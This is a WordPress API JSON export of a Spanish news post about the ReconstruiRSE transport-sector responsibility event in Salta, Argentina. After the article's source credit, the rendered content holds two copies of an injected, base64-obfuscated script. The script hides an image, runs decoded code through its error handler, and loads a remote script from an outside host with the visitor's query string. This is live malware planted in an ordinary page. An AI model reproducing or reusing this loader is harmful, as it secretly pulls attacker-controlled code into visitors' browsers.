{"id":2560,"date":"2023-04-26T14:51:44","date_gmt":"2023-04-26T17:51:44","guid":{"rendered":"https:\/\/circuitosalta.com.ar\/?p=2560"},"modified":"2025-08-14T00:18:05","modified_gmt":"2025-08-14T03:18:05","slug":"salta-se-consolida-como-sede-de-eventos-con-la-exposicion-reconstruirse","status":"publish","type":"post","link":"https:\/\/circuitosalta.com.ar\/?p=2560","title":{"rendered":"Salta se consolida como sede de eventos con la exposici\u00f3n ReconstruiRSE"},"content":{"rendered":"\n<h4 class=\"wp-block-heading has-white-color has-vivid-cyan-blue-background-color has-text-color has-background\"><em>El Tren a las Nubes fue la empresa anfitriona de este encuentro p\u00fablico \u2013 privado del programa nacional que retoma sus objetivos tras la pandemia siguiendo par\u00e1metros de desarrollo sostenible alienado con mejoras del sistema de transporte en el pa\u00eds.<\/em><\/h4>\n\n\n\n<p>Empresas del sector automotriz, minero y productivo confluyeron en el Centro de Convenciones Salta para la reactivaci\u00f3n luego de la pandemia del programa&nbsp;<strong>ReconstruiRSE<\/strong>, competencia del Ministerio de Transporte de la Naci\u00f3n basado en los principios de Responsabilidad Social Empresaria.<\/p>\n\n\n\n<p>El Tren a las Nubes es la \u00fanica empresa de transporte del Norte argentino vinculada a servicios tur\u00edsticos que integra esta iniciativa de la que forman parte empresas como Mercedes Benz, Volkswagen, Nissan, Toyota, Ford, Masterbus, Metropol, Michelin, Scania, Iveco Group, Aeropuertos Argentina 2000, Sancor Seguros.<\/p>\n\n\n\n<p>En la jornada de exposiciones se mostraron las diferentes acciones conjuntas que se vienen desarrollando espec\u00edficamente en el sector del transporte. Estas acciones est\u00e1n dirigidas a lograr una mayor inclusi\u00f3n de los sectores m\u00e1s vulnerables y la mejora del sistema de transporte, entendido como servicio prioritario para el desarrollo de las comunidades.<\/p>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"alignleft size-large is-resized\"><img fetchpriority=\"high\" decoding=\"async\" src=\"https:\/\/www.salta.gob.ar\/public\/images\/noticias\/contenidos\/6852-salta-se-consolida-como-sede-de-eventos-con-la-exposicion-reconstruirse.jpg\" alt=\"\" width=\"291\" height=\"193\"\/><\/figure><\/div>\n\n\n<p>El ministro de Turismo y Deportes&nbsp;<strong>Mario Pe\u00f1a<\/strong>&nbsp;abri\u00f3 la jornada en la que agradeci\u00f3 a referentes p\u00fablicos y privados por elegir a Salta como sede del encuentro. \u201cEsta es una provincia que brinda oportunidades y como Gobierno, tenemos la decisi\u00f3n de apuntalar las actividades econ\u00f3micas que pueden mejorar la calidad de vida de los salte\u00f1os, como lo son la producci\u00f3n, la miner\u00eda y el turismo; este es el camino que se sigui\u00f3 en estos a\u00f1os de gesti\u00f3n del gobernador Gustavo S\u00e1enz\u201d.<\/p>\n\n\n\n<p>El presidente del Tren a las Nubes, Sebasti\u00e1n Vidal, indic\u00f3 que \u201ces un honor para esta empresa formar parte de ReconstruiRSE y ser sede del primer encuentro luego de la pandemia, de esta manera contribuyendo con acciones e iniciativas que favorezcan el desarrollo de las comunidades\u201d. Este \u00edcono tur\u00edstico en el marco de sus operaciones, tiene un alto impacto en las comunidades involucradas en su recorrido.<\/p>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"alignright size-large is-resized\"><img decoding=\"async\" src=\"https:\/\/www.salta.gob.ar\/public\/images\/noticias\/contenidos\/6853-salta-se-consolida-como-sede-de-eventos-con-la-exposicion-reconstruirse.jpg\" alt=\"\" width=\"284\" height=\"189\"\/><\/figure><\/div>\n\n\n<p>En representaci\u00f3n de Naci\u00f3n, estuvo el director nacional de Relaciones Institucionales del Ministerio de Transporte de la Naci\u00f3n, Sergio Gargano, quien resumi\u00f3 en su discurso los objetivos del programa. Por video mantuvo un contacto el ministro de Transporte de la Naci\u00f3n Diego Giuliano, destacando este tipo de espacios para el di\u00e1logo que concientizan al sector de toma de decisiones sobre los intereses comunitarios. Hizo especial hincapi\u00e9 en el contacto con los estudiantes e inst\u00f3 a que sirvan para transferir \u201cexperiencias y conocimientos a quienes reciben este legado\u201d.<\/p>\n\n\n\n<p>En la primera etapa, se realizaron disertaciones por parte de representantes de las empresas del Programa para el empresariado regional. Por la tarde se llevaron a cabo con enfoque en RSE, ponencias para escuelas t\u00e9cnicas y universidades, donde los estudiantes conocieron los programas sociales que se realizan desde las empresas.<\/p>\n\n\n\n<figure class=\"wp-block-gallery has-nested-images columns-default is-cropped wp-block-gallery-1 is-layout-flex wp-block-gallery-is-layout-flex\">\n<figure class=\"wp-block-image size-large\"><img decoding=\"async\" width=\"900\" height=\"600\" data-id=\"2561\" src=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/04\/3283-salta-se-consolida-como-sede-de-eventos-con-la-exposicion-reconstruirse.jpg\" alt=\"\" class=\"wp-image-2561\" srcset=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/04\/3283-salta-se-consolida-como-sede-de-eventos-con-la-exposicion-reconstruirse.jpg 900w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/04\/3283-salta-se-consolida-como-sede-de-eventos-con-la-exposicion-reconstruirse-300x200.jpg 300w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/04\/3283-salta-se-consolida-como-sede-de-eventos-con-la-exposicion-reconstruirse-768x512.jpg 768w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/04\/3283-salta-se-consolida-como-sede-de-eventos-con-la-exposicion-reconstruirse-696x464.jpg 696w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/04\/3283-salta-se-consolida-como-sede-de-eventos-con-la-exposicion-reconstruirse-630x420.jpg 630w\" sizes=\"(max-width: 900px) 100vw, 900px\" \/><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"900\" height=\"600\" data-id=\"2562\" src=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/04\/3284-salta-se-consolida-como-sede-de-eventos-con-la-exposicion-reconstruirse.jpg\" alt=\"\" class=\"wp-image-2562\" srcset=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/04\/3284-salta-se-consolida-como-sede-de-eventos-con-la-exposicion-reconstruirse.jpg 900w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/04\/3284-salta-se-consolida-como-sede-de-eventos-con-la-exposicion-reconstruirse-300x200.jpg 300w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/04\/3284-salta-se-consolida-como-sede-de-eventos-con-la-exposicion-reconstruirse-768x512.jpg 768w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/04\/3284-salta-se-consolida-como-sede-de-eventos-con-la-exposicion-reconstruirse-696x464.jpg 696w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/04\/3284-salta-se-consolida-como-sede-de-eventos-con-la-exposicion-reconstruirse-630x420.jpg 630w\" sizes=\"(max-width: 900px) 100vw, 900px\" \/><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"560\" height=\"373\" data-id=\"2563\" src=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/04\/89321-salta-se-consolida-como-sede-de-eventos-con-la-exposicion-reconstruirse.jpg\" alt=\"\" class=\"wp-image-2563\" srcset=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/04\/89321-salta-se-consolida-como-sede-de-eventos-con-la-exposicion-reconstruirse.jpg 560w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/04\/89321-salta-se-consolida-como-sede-de-eventos-con-la-exposicion-reconstruirse-300x200.jpg 300w\" sizes=\"(max-width: 560px) 100vw, 560px\" \/><\/figure>\n<\/figure>\n\n\n\n<p>Fuente:\u00a0<strong><a href=\"https:\/\/www.salta.gob.ar\/prensa\/noticias\/salta-se-consolida-como-sede-de-eventos-con-la-exposicion-reconstruirse-89321\" target=\"_blank\" rel=\"noopener\" title=\"\">Secretar\u00eda de Prensa y Comunicaci\u00f3n<\/a><\/strong><\/p>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script><script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>El Tren a las Nubes fue la empresa anfitriona de este encuentro p\u00fablico \u2013 privado del programa nacional que retoma sus objetivos tras la pandemia siguiendo par\u00e1metros de desarrollo sostenible alienado con mejoras del sistema de transporte en el pa\u00eds. Empresas del sector automotriz, minero y productivo confluyeron en el Centro de Convenciones Salta para [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":2563,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"tdm_status":"","tdm_grid_status":"","footnotes":""},"categories":[16],"tags":[],"class_list":{"0":"post-2560","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-ferias-y-congresos"},"_links":{"self":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/2560"}],"collection":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=2560"}],"version-history":[{"count":3,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/2560\/revisions"}],"predecessor-version":[{"id":7101,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/2560\/revisions\/7101"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/media\/2563"}],"wp:attachment":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=2560"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=2560"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=2560"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}